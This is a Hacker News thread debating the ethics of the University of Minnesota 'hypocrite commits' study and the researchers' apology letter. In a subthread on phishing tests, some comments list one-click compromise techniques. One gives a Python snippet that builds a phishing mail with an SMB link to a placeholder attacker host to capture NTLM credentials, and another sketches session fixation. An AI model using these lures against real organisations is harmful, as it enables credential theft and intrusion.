Hacker News
Open letter from researchers involved in the “hypocrite commit” debacle (kernel.org)
264 points by marcodiego on April 25, 2021 | 376 comments


There is a major error made by the research group. It starts and ends here: "we did that because we knew we could not ask the maintainers of Linux for permission, or they would be on the lookout for the hypocrite patches."

I am a Red Teamer and work with companies to understand how their detective/preventative/recovery controls and processes are working. Here's how you resolve this:

You work with maintainers to get their coordination on the research. You work out a mechanism to prevent submitted patches from being merged (e.g. maintainers are notified before bad patches accepted by code review processes are merged).

You do not tell them when the patches are coming. You do not tell them which identities are going to be used for the patches (e.g. from which email addresses). You do not tell them which area of code will be targeted. You set rules and time bounds for the study.

You wait some amount of time before submitting such patches (weeks to months). Realistically this is all that's needed. If hypersensitive, set this up earlier and let it bake longer.

At this point, you submit patches from a variety of addresses (probably not associated with your university - it is easy to create many such identities). You also can coordinate with other researchers, universities, and companies to submit patches under identities as needed. You also study submitting from yandex, gmail, .cn and other email addresses (because isn't that interesting to know?).

The premise that there's some ultimatum between working with the community and performing the research is on its face incorrect. This is either ignorance or laziness on the part of the researchers. Clearly, they hadn't taken the time to work with the community to work out an approach that could be mutually acceptable.


I agree with the approach you’ve outlined.

I also empathize with the plight of the researchers — Linux is a bit different than normal Red Team engagements, in that a normal organization has a bunch of administrative/management layers who typically do not participate in the operations of the system being tested. A VP of engineering at a medium to large company is unlikely to be committing code, much less maintaining the build pipeline etc.

This is not the case with Linux. The people “at the top” are also reviewers, and so it’s pretty likely that notifying them will result in a change of behavior.

I wonder if there is some way to build some sort of Red Team consent “blind trust” organization, such that willing open source projects could agree to responsible attacks, and the attackers could register their work (including disclosure / mitigation plans) with the blind trust ahead of time.


Why do you think there will be any change in behavior?

It is not like community members haven't been on the lookout for bad commits in every new commit from most committers anyway, since at least 2003, and I think substantially earlier.


This is how it should've been done. Like a war game (at least, as depicted in movies like Down Periscope), the organizers of the study and the project maintainers need to agree on (and be aware of!) the bounds of the study, without necessarily knowing all of the details.


> You work out a mechanism to prevent submitted patches from being merged (e.g. maintainers are notified before bad patches accepted by code review processes are merged).

It is my understanding that this happened and that no bad patches were actually merged.


Except there was no consent from maintainers here.


Great plan. Agree with all. Thanks.

In your experience, do you create a "fail safe"?

So for this study, some way for the researchers to prevent any of their patches from ever being released.


>I am a Red Teamer and work with companies

OK, how do you test SocEng vectors? Do you obtain consent and coordinate with every employee that might be targeted to receive your e-mail?

>You also study submitting from yandex, gmail, .cn and other email addresses

No, the point was submitting from a known and respectable entity, which might affect the level of scrutiny. They weren't testing a whole patching process, but a specific human component of it.


You don’t. You work with the leadership & security team. Any employee that clicks your phishing email gets an extra dose of security training. Those that forward the email to abuse@corp.com get a nice compliment.


Just clicking the link is enough to fail? No need to enter private info or execute downloaded files? Either your phishing emails are badly crafted or you expect employees to see the future.


Agreed. This is something that made me very annoyed when they did it to us. I know exactly what I'm doing, I know that you can't infect a computer from opening a link unless the attacker possesses a new browser 0-day, and expecting your average employee to worry about new browser 0-days is ridiculous.

If it were an obvious phishing URL, like a variation on the company domain, then fine (maybe). But it wasn't.


I've run such phishing campaigns where the link:

1. (Windows specific) Opens up a Windows file share, which causes the person to authenticate to the file share, which through PtH/Responder results in their enterprise credentials being stolen.

2. Exploited a XSS or CSRF attack on an internal/management endpoint. Which in turns allows a pivot from external to internal access.

3. Steals a web session, cached password or authentication token, resulting in compromise of employee credentials to be used elsewhere (e.g. reused to access enterprise VPN).

These are just some not-a-browser-0day examples of a single click being game-over dangerous.
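For vector 1, the lure only needs a single link that resolves to an SMB path; when a Windows client follows it, the OS attempts NTLM authentication to the attacker's host, where a tool like Responder can capture the exchange. A hedged sketch of what such a mail body could look like (the attacker host name is a made-up placeholder):

```python
# Sketch of vector 1: a phishing mail body whose link targets an SMB
# share. Following the link makes Windows try to authenticate to the
# attacker's host, leaking NTLM credential material.
# "files.attacker.example" is a hypothetical attacker-controlled host.
link = "file://files.attacker.example/quarterly-report"

html_body = (
    "<p>The Q2 numbers are ready for review:</p>"
    f'<p><a href="{link}">Open quarterly report</a></p>'
)
print(html_body)
```

The point is that nothing here requires a browser exploit; the single click is enough to start the authentication attempt.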


That exploit could happen ANYWHERE on the web. Any freaking link. Anything on a newspaper website, or social network.

You're talking about vulnerabilities in components, or other software, here. The user, by himself, is doing nothing wrong.

Why don't you just restrict employees to the intranet, then? Why do you give them free roam on the whole internet, but then you tell them "don't click the wrong link!".

Phishing happens when the user does something which is actively wrong. When the user opens a Word/Excel file with VBA from an untrusted source and bypasses security restrictions. If they execute/install something unsigned and untrusted from some random site.

Click = fail is just wrong. Links are how the internet works. You aren't teaching anything.


> 3. Steals a web session, cached password or authentication token, resulting in compromise of employee credentials to be used elsewhere (e.g. reused to access enterprise VPN).

How do you do this without a browser vulnerability (and assuming it's not also XSS/CSRF like the previous point)?


You can do this with chains of vulnerabilities, including but not limited to insecure redirects, CSP bypasses, insecure cookies. Another useful technique is session fixation - you give your victims sessions you've started and often their SSO experience will connect _their_ credentials to _your_ session.

Also, to distinguish it from #3: XSS in #2 was intended to mean "persistent stored XSS" as opposed to "reflected XSS". In the case of reflected XSS, this can be chained with CSP bypasses and insecure cookies to grab out e.g. bearer tokens.

My overall point is that heap feng shui 0-days are not required for 1-click ownage. In practice, I've not had to burn a browser 0-day to compromise organizations or their customers.
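The session-fixation technique mentioned above can be shown with a toy session store (all names here are hypothetical); the vulnerable pattern is accepting a client-supplied session id and never rotating it at login:

```python
# Toy sketch of session fixation: the server accepts any session id
# the client supplies (the vulnerable pattern), and does not issue a
# fresh id when the user authenticates.
sessions = {}  # session_id -> authenticated user (None = anonymous)

def visit(session_id):
    # Vulnerable: accept a client-chosen id instead of issuing a fresh one
    sessions.setdefault(session_id, None)
    return session_id

def login(session_id, user):
    # Vulnerable: no session rotation on login
    sessions[session_id] = user

# Attacker starts a session, then sends the victim a link carrying that id
attacker_sid = visit("attacker-chosen-id")
# Victim follows the link and logs in over the fixed session
login(attacker_sid, "victim@corp.example")
# The attacker's known id now maps to the victim's authenticated session
print(sessions[attacker_sid])  # victim@corp.example
```

The standard mitigation is to issue a brand-new session id at the moment of authentication, so an id the attacker planted never becomes privileged.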


I assume you're right on those techniques, but 2 things:

1. It sounds like they'd have to be pretty well targeted against the precise systems of that particular company in order to work. Which would tend to suggest more targeted spear-phishing attacks and extensive recon being done against the company systems somehow before anybody launched a real black-hat attack.

2. At that point, it feels hard to blame the individual employee versus whoever misconfigured those corporate services in the first place. Though I would guess it's fairly common for those kinds of things to happen due to many systems being set up without the help of true experts, and the unlikeliness of a real attack against them without either a highly-skilled black hat targeting them or securing the services of a skilled and pricey pen test team.


1. You are correct. I would measure the effort in terms of a small number (1-3) of weeks of recon and targeting for a team of two.

2. I agree. Individual employees are not at all to blame. Companies who are blaming their employees for getting phished are doing it wrong. The correct action to take is to inform employees and build the other kinds of mitigations mentioned elsewhere in this topic tree.


> I've run such phishing campaigns

To test if employees are easy to phish, or was it for real (black hat)?


The former _only_.

I'm usually not testing only whether employees are easy to phish (the answer is pretty much 100% yes). I'm testing end-to-end: can you as a company prevent me from phishing through email protections? Can you detect when I'm phishing your employees? Will your employees report potential phishing emails? Can you figure out (without me telling you) which employees were targeted and which attacks were successful? Can you figure out which credentials/machines would need to be quarantined/rotated/examined?


This job seems like fun :-)

Even more fun if you were allowed to social engineer your way into the office and steal someone's powered on not-screenlocked laptop :-)


The same domain can't be guaranteed to be safe.


Megacorp I work at does this. I think I've had around 1 phishing mail per month for the last year or so, and yes, just clicking the link is enough to fail.

It's particularly annoying where I work, as the company itself sends out a completely unreasonable amount of internal spam every.single.day - often with bad spelling/grammar, and very often with the contents being a single image with rendered text (why?!?!).


A popular phishing test vendor populates message headers with a very specific word that you can build a mail rule from. In three years it has flawlessly identified every test sent my way with zero false positives.
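Once the marker header is known, the rule is trivial to express in any mail filter. A hedged Python sketch of the same check (the header name and token here are made-up placeholders, not any real vendor's):

```python
import email
from email import policy

# Hypothetical marker values -- inspect the raw source of a known test
# message to find the real header your vendor uses.
PHISH_TEST_HEADER = "X-PhishTest"          # hypothetical header name
PHISH_TEST_TOKEN = "training-campaign"     # hypothetical marker word

def is_phishing_test(raw_message: str) -> bool:
    """Return True if the message carries the vendor's telltale header."""
    msg = email.message_from_string(raw_message, policy=policy.default)
    value = str(msg.get(PHISH_TEST_HEADER, ""))
    return PHISH_TEST_TOKEN in value.lower()

sample = (
    "From: it-security@corp.example\r\n"
    "X-PhishTest: Training-Campaign-2021\r\n"
    "Subject: Urgent: reset your password\r\n"
    "\r\n"
    "Click here...\r\n"
)
print(is_phishing_test(sample))  # True
```

In practice you'd express the same test as a server-side rule (e.g. a Sieve `header :contains` test) so the messages never reach the inbox at all.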


> Just clicking the link is enough to fail?

Yes, clicking on links is dangerous[0].

0. https://www.bleepingcomputer.com/news/security/google-fixes-...


So, we don't click on links anymore? Anywhere on the internet? Just about any site can deliver a malicious link.

How can I tell whether I can click on a link? Sometimes there's even something like linkprotector.outlook.com/[very_long_url] in corporate emails.

My usual approach if I'm unsure whether a link is malicious would be to open it in a private window (and probably in a different browser from the one I usually employ), or if I really think it's phishy, I would open it from within a throwaway VM.

So, the blanket "click and fail" policy seems pointless to me. If I enter some login/PII, then I can agree I've failed the test. But a click on a link cannot be considered failure.


> No, the point was submitting from a known and respectable entity

They weren't, though - their own paper explicitly says they used newly created Gmail addresses for the patches...

"We submit the three patches using a random Gmail account to the Linux community and seek their feedback—whether the patches look good to them."


I think it would be obvious that you work with the organisation security team and not individuals.


This apology fails from the 5th word:

"We sincerely apologize for any harm..."

While there are other requirements, a sincere apology cannot in any way entertain doubt about the fact that there WAS harm.

Truly acknowledging the harm done is foundational to a real apology, and most of us (myself included) end up sneaking in weasel words or phrases like this.

Psychologically, it's nice for the apologizer, since it allows one to think "I'm being good by apologizing, but maybe I didn't do anything bad after all?".

But from the apologizee standpoint, these phrases are often devastating and can make it clear that the apologizer has no real recognition or care of what happened.

Personally I've worked pretty hard to try to remove these sorts of phrases from my apologies. It's not easy. It makes you feel much more vulnerable and you really have to let whatever you did sit with you in a very uncomfortable way. But it's worth it.


Exactly my feeling too when I read this apology.

For me, it reads like this "With the best intentions, we were helping you. Unfortunately, you are too stupid to not realise this. We are sorry that we hurt your feelings, but please let us continue in helping you."

When you get such an apology, best thing is to avoid such people. Because it's clear they do not understand where they went wrong.

They should have either apologized with "we made a very big mistake that had a negative impact, it did more harm than good". Or they should have argued with real evidence on how they improve the Linux kernel, like refer to real exploits that they fixed.

This is just a "we're sorry that you don't realize we are helping you"


The issue I have with the letter (not being involved at all and just following) is that it feels like an apology of the bully at school that took your lunch money, and the parents found out.

Honestly, for all we know this letter could be meaningless. A real good actor would also reveal the other commits in order to have a full disclosure.

Trust isn't based on promises, trust is based on past actions. Therefore they should be treated as such, as their actions are evidence for being a potentially malicious actor.

I'm still convinced Greg did the right thing here, as it's better to be safe than sorry in this case due to the sheer scale of an attack vector that the actors might have introduced.

Even if other commits of good actors at the same university are now treated with more attention to their code, I think they are a casualty that was predictable the moment the ethics committee signed off on the paper's research procedure.


This interpretation looks flawed. You discredit the entire message based on a single word, a very general word whose meaning you pinned to a definition which results in the most negative interpretation, and you also ignore the fact that they explicitly state the damage it caused in the same paragraph.

To clarify: I'm not arguing this is a good or bad apology; just that the justification provided here looks flawed. Human speech isn't a programming language; it's not well defined and it's more than the sum of its parts. One can't derive conclusions about a text by analyzing a tiny subset out of context.


If this was a transcript of a spoken apology I might be of your train of thought, but this was a composed letter looked over by (ostensibly) multiple folks. The wording was a choice.


Strongly agree with your sentiment; any premeditated/composed message is held to a higher standard (and rightfully so). I'm not arguing that one shouldn't analyze the wording, but that the analysis here is flawed (for the reasons I stated).


I would argue at this point in collective awareness of public communications, using a form of "sorry if I did any harm" regardless of specific words used is an explicit decision by the writer to not accept full culpability. I agree with original comment, when you see a weasel apology introduction, reading the rest is of little value.


> I would argue at this point in collective awareness of public communications, using a form of "sorry if I did any harm" regardless of specific words used is an explicit decision by the writer to not accept full culpability.

Based on my experience with the general public, with academics, and with industry folks, the criteria for what constitutes a sincere apology is not known by the majority. Furthermore, many of those who have heard the criteria do not accept it as a gold standard, and disagree with it (even those who are not being looked to for an apology).

The recipient can always choose to accept or not an apology. However, I find it quite distasteful to attribute intentions to someone simply because they did not follow a recipe (even if the choice not to was intentional).


I find it nicely clear in German. If you wrong someone, you're loading guilt onto yourself ("mit Schuld beladen"). You'll then ask to be forgiven ("um Entschuldigung bitten" is "asking to be relieved of the guilt"), and the other party can lift the guilt ("entschuldigen"). You can also say "ich entschuldige mich", which skips that step and is essentially "I absolve myself".

While it's common in colloquial German to use the one-step-absolution and skip over the possibility of the other party not absolving you, it's also often considered rude when it matters and has a taste of "but not really". It's fine when you accidentally stepped on someone's foot, but not so much when you've stolen their car.


“I’m sorry if I hurt you,” is a very different statement from, “I am sorry I hurt you.” One makes responsibility conditional, and the other takes responsibility.


I actually bounced from the text at that point as well. It taints the whole thing and makes it feel contrived.


Strong disagree. You should always apologize for _what you did_ not the _effects_ of what you did. Lead with and more strongly emphasize your actions and how they were inappropriate.


"Please respond to the strongest plausible interpretation of what someone says, not a weaker one that's easier to criticize. Assume good faith."

https://news.ycombinator.com/newsguidelines.html

I think it's both unfair and non-constructive to pick apart an apology letter based on one word like that. Let's assume good faith, especially when English might not be the writer's first language (based on their name).


I think this response misses the point. The purpose of an apology is to make the recipient feel that you're sorry. That means thinking about how word choice is received is critical in crafting a good one. Your parent isn't saying the author's choice of words is in "bad faith", they're saying the author's word choice falls short of an effective apology due to a mistake that's common and easy to make. I agree, and I have done this myself in the past.


It seems like a nitpick to me, since the rest of the apology uses the proper choices of words, though. "The method used was inappropriate", "we made a mistake", etc.

The apology is also specific about what they did wrong despite their intentions. It really is a good apology after reading past the first six words.


ESL here. How correct is it to use ‘any harm’ to mean ‘all harm’?


1) "We apologize for any harm we might have caused"

2) "We apologize for any harm that we caused"

3) "We apologize for all the harm that we caused"

(1) is the least apologetic. This could be interpreted as saying "we might or might not have caused harm, and we think we didn't but you think we did, so we're going to apologize for your sake, but we're not really sorry because we didn't do anything wrong from our perspective".

(3) is the most apologetic. You acknowledge that you did something wrong, and that you're apologizing for it. This might be followed up with a specific list of the things that you did wrong, and that you are apologizing for. That would make for the most sincere apology. This could be interpreted as "we caused harm and we're sorry, whatever harm you think that we did, we agree that you are right, and we are sorry for all of it".

(2) is partway between (1) and (3). You acknowledge you caused harm, but you won't enumerate the things that you did wrong. So, you leave yourself a little bit of wiggle room. This could be interpreted as "we caused harm and we're sorry, but we didn't cause that much harm, we think it was actually quite little, you think it was a lot, but we're saying sorry, so let us go with this apology".


A sincere written apology should be 3. You needn’t misrepresent your own intentions to do this, but it does require thinking about the specific harms you have caused (perhaps unintentionally) and enumerating them in a way that doesn’t minimize their import. That is the anatomy of a true apology. It requires taking the other perspective as fact.


There isn’t much difference and both are really correct. The problem with ‘any’ as raised here is the ambiguity. It could be taken to mean ‘any harm, if it occurred’ or ‘any single bit of harm that did occur’. So in this sense ‘all harm’ would be safer and less ambiguous.


That depends on the sentence context.[1] As used here it is fully correct; "we sincerely apologize for all harm our research group did" would be highly anomalous, whereas the phrasing they actually used is conventional.

"We sincerely apologize for all the harm our research group did" would be a little less unnatural than "...for all harm...", but it's still an unusual choice of wording that ends up sounding like you want to emphasize that you did an unusually large amount of harm.

A more standard phrasing that includes the word all would be "We apologize for any and all harm...".

The standard form I know is actually "[I am deeply sorry] for any harm I may have caused..."; the letter here does not use a modalized verb. (Compare their "We sincerely apologize for any harm our research group did...".) In that sense it's more definite than usual. The criticism above is strange.

(The reason for the modality in the standard form isn't really to leave open the possibility that you didn't do any harm. It's to leave open the possibility that you did harm you don't even know about -- and therefore can't apologize for specifically.)

[1] In general, any occurs only in negative sentences, though in the details there are several types of sentences that are sort of "honorarily negative" for the purposes of allowing any and other words that obey the same restrictions.


How about "we apologize for the harm"?


You want my opinion? It's possible, it's less standard than the "for any harm" form, but it means roughly the same thing.

It wouldn't have occurred to me to discuss it above, because I thought I was contrasting any with all, and neither is present in that example. But I'd rate it above most of the alternatives discussed (while still below "for any harm").


Not correct, at least in this context. "Any harm" means there could be no harm, or some harm, but "all harm" admits there was harm. I.e. "any" is not an admission of doing harm, or an acceptance that it happened.

If you want to apologise, "all harm" admits you caused harm, which seems necessary for an apology. "Any" is a bit like those "I'm sorry if you were offended" non-apologies, though in this case the rest of the message does better than that.


I would go with "We apologize for the harm [that] we caused" which seems the most natural choice while explicitly acknowledging that some harm was caused. "All the harm" does indeed come across as a bit inflated, as other commenters have mentioned.


As others have said, 'any harm' implies that there might be none, while 'all harm' implies there is definitely some harm. So, 'all harm' is definitely the better choice of words for an apology (in this context.)

I am surprised to see people hung up on this, because the rest of the letter acknowledges specific harms done. To me, it really seems like a minor thing, and something that I might have written (as a native English speaker.)


We are talking about deliberate security vulnerabilities in the Linux kernel, a piece of critical infrastructure. Frankly, this is not the place to assume good faith.


But they did not introduce security vulnerabilities, as they prevented the bad patches from being merged.


Those measures were insufficient, as according to the developers, a number of the bogus patches were merged and had to be reverted.


Sort of?

The "hypocrite commits", according to the researchers' own paper, originated from "random Gmail addresses", and the researchers continue to claim none of those got merged (though since they haven't told us what they were, ...)

The additional claim is that some of the commits not covered by their "hypocrite commits" (and thus, submitted from their UMN addresses) contained security bugs, deliberate or not, and the loss of trust in the researchers is sufficient to justify reverting all of their commits until they can be reviewed.


I think the kernel maintainer reverted all the patches coming from that university, regardless of whether they were bogus or not.


> English might not be their first language (based on their name)

This is a pretty weak assumption. Someone's name (and physical appearance) don't give you accurate information about anything.


I don't think it's that weak of an assumption. First, considering all the people with foreign names in relevant groups (multinational corporations, or in this case, a researcher/student at a university), I would say the chances that their first language is not English are high enough to be a consideration. And even if it is, there are also regional variations regarding what are common and accepted ways of phrasing things. Second, similar to the rule used here at HN, giving the text a more charitable read should be the starting point.


Those guidelines only apply to members of this community, not an outside article. We should assume all users on HN honour the guidelines; we don't need to assume outside articles do.


I read it as a comment that was criticizing the language, not the intention of the apology. As such, they are not implying that the apology was insincere, but pointing out language in the apology that the poster has often added themselves, and that gives the appearance of insincerity to the recipient. To me that is the strongest possible interpretation of the comment you are replying to.


That’s responding to comments on HN. This apology wasn’t on HN.


In the researchers' shoes, I would retract the paper from IEEE, and only then send the open letter. Because they did not do this, the open letter does not look sincere. I am sure the researchers were aware that there were multiple complaints regarding their paper before the ban. The least they could have done is acknowledge such failures in the open letter.


This is probably because they don't mean the apology, they were forced to write it by their administrators.

And to be honest, I kind of agree with them. I don't really see what they did here as particularly bad. They demonstrated a very serious vulnerability in the linux kernel development process. I guess the harm they caused was wasting maintainers time, a bit? But what we all got out of it is the knowledge that real bad actors could easily have done this too. It's odd to me that people are focusing on like, the etiquette here when such an important vulnerability was demonstrated.


The purpose of the research was to publicly announce that the research subjects (who did not consent to being studied) messed up. The research consisted of submitting patches specially crafted to make sure the (non-consenting) subjects did indeed mess up.


Ya, I get that. But the point was to demonstrate that the project was vulnerable to this kind of attack - which it was. That's an extremely important finding.


They performed an experiment on human subjects without informed consent.


Sure, but so does every website that AB tests a landing page. Consent is only relevant when there is some risk to the subject (or something they value, like privacy, etc).


What about the risk to the reputation of anyone who approves these patches? Or of intentionally buggy patches making it into the wild and being exploited?


> What about the risk to the reputation of anyone who approves these patches?

This is a risk, but exposing vulnerabilities is always preferable to leaving them in place.

> Or of intentionally buggy patches making it into the wild and being exploited?

There was no real risk of this. They specifically did not allow it to make its way into real releases.

If they had allowed it into actual releases, I would have a serious problem with that.


There is also the risk that a third party sees the patch on a mailing list, and merges it to his internal branch because it looks like it is fixing one of his problems.

But I'd argue it is his own fault for using unsupported patches.


> Consent is only relevant when there is some risk to the subject

Says who? I don't think that's true according to IRB standards in the US. Nor is it true for websites who A/B test according to the GDPR


> Says who?

Me and common sense. I don't believe consent is relevant when there is no risk of harm to the subject. IRBs and the GDPR are overly aggressive on this point, probably as a reaction to real and important violations of privacy. But the idea that A/B testing the color of your CTA button on a landing page requires informed consent is absurd.


> But the idea that A/B testing the color of your CTA button on a landing page requires informed consent is absurd.

A/B testing on major platforms is much more sophisticated than that[1].

It's a crucial practice for advertisers and marketing teams that dives deep into researching the psychological response towards images, text and dozens of other variables. Human subjects are acting as lab rats in order to extract some data points to drive the next test and campaign.

So, yes, it should definitely require informed consent and opting in.

[1]: https://www.bbc.com/news/technology-28051930


> A/B testing on major platforms is much more sophisticated than that[1].

On some it is, and some it isn't.

> It's a crucial practice for advertisers and marketing teams that dives deep into researching the psychological response towards images, text and dozens of other variables. Human subjects are acting as lab rats in order to extract some data points to drive the next test and campaign.

This is just a long and emotionally laden way of saying "changing images and text to see which works best".

> So, yes, it should definitely require informed consent and opting in.

Guess we're just going to have to agree to disagree then. I don't see any reason whatsoever to think that this practice is harmful to the subjects being experimented on.

At worst, it's harmful to society in general because it incentivizes consumerism and potentially self destructive behavior. But that is completely orthogonal to the issue of informed consent. If you got perfectly informed consent from 10,000 people to tease out the perfect pitch text, and then deployed it against the rest of the population, the effect would be exactly the same, whether or not you got consent.


There's lots of systemically horrible things that can happen if you're not careful about what you allow. If you're interested why these ethical principles exist in the United States, I suggest you at least skim the Belmont Report

https://en.wikipedia.org/wiki/Belmont_Report


> There's lots of systemically horrible things that can happen if you're not careful about what you allow.

Of course there are. But what specifically are the harms that are going to be caused by either this research or a landing page A/B test without a click through pop up? The existence of theoretical harms for broad categories of potential research does not have a whole lot of bearing on these specific lines of research.

> If you're interested why these ethical principles exist in the United States, I suggest you at least skim the Belmont Report

I read it. It was interesting, but I don't think it's particularly relevant here. The only prong of its test that would be relevant to this experiment is "respect for persons". The idea that somehow not revealing the bug or the experiment was intrinsically harmful as a violation of a person's moral autonomy.

I don't buy that line of reasoning, and I can't really think of any valid consequentialist justification for it, and the report itself does not attempt to justify it either, as far as I can tell.


If I sit across the street from your house in a van and observe your life, noting down the times you come and go, logging what I can see through your window, and then use that data to market things to you, would you agree that you'd rather be able to provide and withdraw consent for this activity? No harm done to you.


I think it's reasonable to consider invasion of privacy a harm on its own. There was no invasion of privacy in this example.


If anything they wasted time and energy of project maintainers. This alone should be enough to see the behavior is inexcusable.


Ya, they wasted a bit of their time. That wasn't very nice. But it's hardly the great crime it's being made out to be, and what they did was a huge public service. It's impossible to overstate the importance of linux kernel security.


You don't get to decide what you think is important and then burden others with pushing it. If you think testing security with random attacks is important, tell the people who run the project. They are the ones qualified to make the call.

It's just a scammy move at best. To me it's borderline criminal to sabotage a project like that.


This is the part I'm personally most interested in. Research generally has pretty strict ethical regulations about consent. I'm wondering if this would qualify as a violation of any of their university's or the conference's rules.


That's how security is tested. TSA undergoes undercover testing.

https://abcnews.go.com/US/tsa-fails-tests-latest-undercover-...


TSA agents are informed that there are tests as part of their job. See this comment for another example of informed consent in security testing

https://news.ycombinator.com/item?id=26929797


Their biggest crime seems to be that they just aren't great developers. If you look at the patches they presented, which to their knowledge were correct, you'd see they couldn't have done anything useful. Because of their earlier work this was taken as intentional malice, but if they had been submitting great work it wouldn't have been an issue.


What is the serious vulnerability? That sometimes bugs slip through?


How extremely easy it is for a nation state or other malicious actor to intentionally introduce bugs.


Was there ever any doubt?


Perhaps not, but was it on people's radar as much as it is as a consequence of this event?


That fifth word is a mistake and the apology certainly has flaws, but you are being extreme.

A more substantial criticism is that blending we’re sorry with excuses and mitigating explanations is what makes it lose impact.

But really, they acknowledge the harm they did and they said sorry and I hope you give them some credit for doing so.


In some variations of English, "any" can mean the same as "all" in cases where you are uncertain you know every possible harm.

Indeed: "The Court held that the word 'any' is to be considered all-inclusive."

https://www.michbar.org/file/generalinfo/plainenglish/pdfs/9...


> end up sneaking in weasel words or phrases like this.

Honestly, based on the way they handled their "research" in the first place, sneaking weasel words into an open apology letter is entirely par for the course...


Oh yeah, the "mistakes were made" passive-voice non-apology apology. zzzz


Your critique seems more about waffle words in apologies and less about this specific apology. While they do waffle in that sentence, on the whole, their apology seems pretty sincere. They acknowledge their error and the harms they perceive they caused. As a linux user, I am inclined to accept.


I too bristled at the word “any” for an apology.

I would have listed the specific harms in a concise manner instead.

Maybe save that word “any” for the end, and only as part of a forward-looking pledge to avoid future harm.


Wait. 'Any' can mean 'none at all' in this context?


> a sincere apology cannot in any way entertain doubt about the fact that there WAS harm

Someone will always be apologizing wrong to someone. One interpretation of what harm there was is not necessarily the same as my interpretation. There are too many ways to construe what harm there was, or may have been, according to others, to satisfy everyone addressed. This is an efficient wording that doesn't explicitly address the specific issues you (and many people in "the community") have, which illustrates the point.


"If you give me six lines written by the hand of the most honest of men, I will find something in them which will hang him."

I understand doubting the sincerity of the authors, but this argument hinges here on them saying "any" instead of "all" and they are often used interchangeably in casual conversation.


This isn’t casual conversation. This letter should be a full, formal apology.


I really appreciate the apology and as they stated, its unconditional nature. Good.

However, I find something very problematic. This quote shows it:

"We have learned some important lessons about research with the open source community from this incident."

This is something I don't like. This is not something about "research with the open source community". If anything, they should have learned something about treating human beings as persons and not as involuntary guinea pigs. They should have learned something about not breaking anyone's good faith and trust (not only an open source community's), and respecting it.

They behaved like jerks and they still cannot see that.


I think there is something to be applauded about people who genuinely apologize even though they can't see things from the other person's point of view.

They didn't decide to conduct this research on a whim. They had full approval of their university ethics board as well. They published a paper and had it peer reviewed without (as far as I know) anyone immediately calling for their heads.

They can't immediately do a heel-face turn and believe their actions are wrong, always were wrong, and that the wrongness should have been obvious to them.

Yet, despite this they recognize the hurt they've caused and are genuinely apologetic and will never do it again. Asking them to dismantle their world view in a week is a bit much, even criminals are given a few years of quiet contemplation before being asked to tell a parole board they have changed their hearts and minds.


That only tells me that there's more garbage than just one individual.

If they lack knowledge of why it was bad, what will prevent them from doing another garbage study next time?


This incident, time, and reflection.


But their self-reflection, and I'd say their basic ethics, is severely lacking.

This study could have been done with consent, with limited bias, but they chose to go the idiot route.


This paper had multiple issues that they were aware of before the ban: the original ban email indicates that a complaint was made to their university earlier, and on Twitter one of the researchers stated that IEEE also received a complaint regarding the ethics of the paper, well before the ban.


They only sought approval from the ethics board after the fact IIRC


"If anything, they should have learned something about treating human beings as persons and not as involuntary guinea pigs."

Perhaps the entire "tech" industry needs to learn that lesson. Non-technical end users should be entitled to that same level of trust as nerds. I can download free open source code, extract a tarball and build the software without worrying too much about scanning through all the files first for phone home/telemetry/OriginTrials nonsense.^1 However non-technical end users who use programs compiled for them by "tech" companies with ads and surveillance as their "business model" are not entitled to the same trust. I cannot think of any justification for the difference.


> Perhaps the entire "tech" industry needs to learn that lesson.

Audit studies are conducted all the time where researchers lie to people and waste their time.

> Factors Determining Callbacks to Job Applications by the Unemployed: An Audit Study

> We use an audit study approach to investigate how unemployment duration, age, and holding a low-level “interim” job affect the likelihood that experienced college-educated females applying for an administrative support job receive a callback from a potential employer. First, the results show no relationship between callback rates and the duration of unemployment. Second, workers age 50 and older are significantly less likely to receive a callback. Third, taking an interim job significantly reduces the likelihood of receiving a callback. Finally, employers who have higher callback rates respond less to observable differences across workers in determining whom to call back. We interpret these results in the context of a model of employer learning about applicant quality

http://www.econ.ucla.edu/tvwachter/papers/audit_study_Farber...


This is a very good point. I did not find anything objectionable about that experiment when I first read about it. And if the companies experimented upon had complained like the kernel maintainers did, I would have dismissed it as them covering up their bad process. This is actually making me consider that the submitters of the bad patches shouldn't be treated differently than the job application researchers.


Very good point. We seriously need to learn this lesson as you said.


Several parts read strangely to me

> we are very sorry that the method used in the “hypocrite commits” paper was inappropriate

This reads more as "sorry you were offended" than "It was inappropriate and we are sorry".

> As many observers have pointed out to us, we made a mistake by not finding a way to consult with the community and obtain permission before running this study; we did that because we knew we could not ask the maintainers of Linux for permission, or they would be on the lookout for the hypocrite patches.

Bringing up why you did something in an apology is very shaky. Like in this case, it can sound more like justifying / excusing.


> Bringing up why you did something in an apology is very shaky. Like in this case, it can sound more like justifying / excusing.

Why is that a problem?


Answering myself: the apology feels more like a justification as to why they did, not an understanding of why they shouldn’t have.


> the apology feels more like a justification

Which I'm guessing is why they made it an open letter. This isn't about acknowledging their misdeeds and trying to fix their relationship with the OS community, this is them trying to sneak in spin and justifications to a public announcement to cover their collective asses, to put forth a false narrative that shows their actions in a better light than they acted in.


>They behaved like jerks and they still cannot see that.

They just come off as disconnected academics. Same thing with the experiments with algorithms from Facebook. They are so wrapped up in what they are doing, they no longer see the "users" as human beings. There are some jobs where this detachment is almost required to survive, like being an ER doctor: if you lose that many patients, it could be debilitating unless you were able to disconnect. That's far and away different from these robots.


Imagine if instead they did this research with the closed source community. You know, get hired under false pretenses, sneak some vulns into some commercial product, write a paper about how easy it was. Pretty sure if they tried that they would be in jail right now.


There are literally companies you can hire that will go this far pentesting your company and the employees involved are not in on it.

How else do you prove your process can stop real infiltrators by state actors?


So? The difference is consent (in your case, from the owners of the company).

There are many crimes in the world that are only crimes if you do it without consent.

> How else do you prove your process can stop real infiltrators by state actors?

One of the common security controls against infiltration by foreign nation states is espionage being a capital offense. While that is obviously not appropriate here, I think it's pretty obvious that these researchers would not have succeeded if they faced the electric chair like a spy would. So I don't think the comparison is apt.


So if we get consent from a C-level at a company, we don't need consent from every other lower level person we trick?

If you have approval from one person in an org of 100,000 is this still okay?

It has to be, because getting explicit consent from every person in the org at that size would be untenable, and make them artificially extra vigilant during a potential audit window.

Well now scale this to open source. The typical web project has 2k+ random nodejs libs in their dependency tree. These are all separate orgs/individuals.

Real world bad actors are backdooring these projects constantly. I specialize in this area of research.

If every white hat has to get permission from exponentially large dependency chains, they will never even come close to being able to compete with black hats here finding the weak links of the chain.

The blackhats set the rules of engagement, for better or worse. White hats should be free to go for it just like with any other vulnerability they evaluate.


> So if we get consent from a C-level at a company, we don't need consent from every other lower level person we trick?

You have to get consent from someone who has legal authority to give it to you.

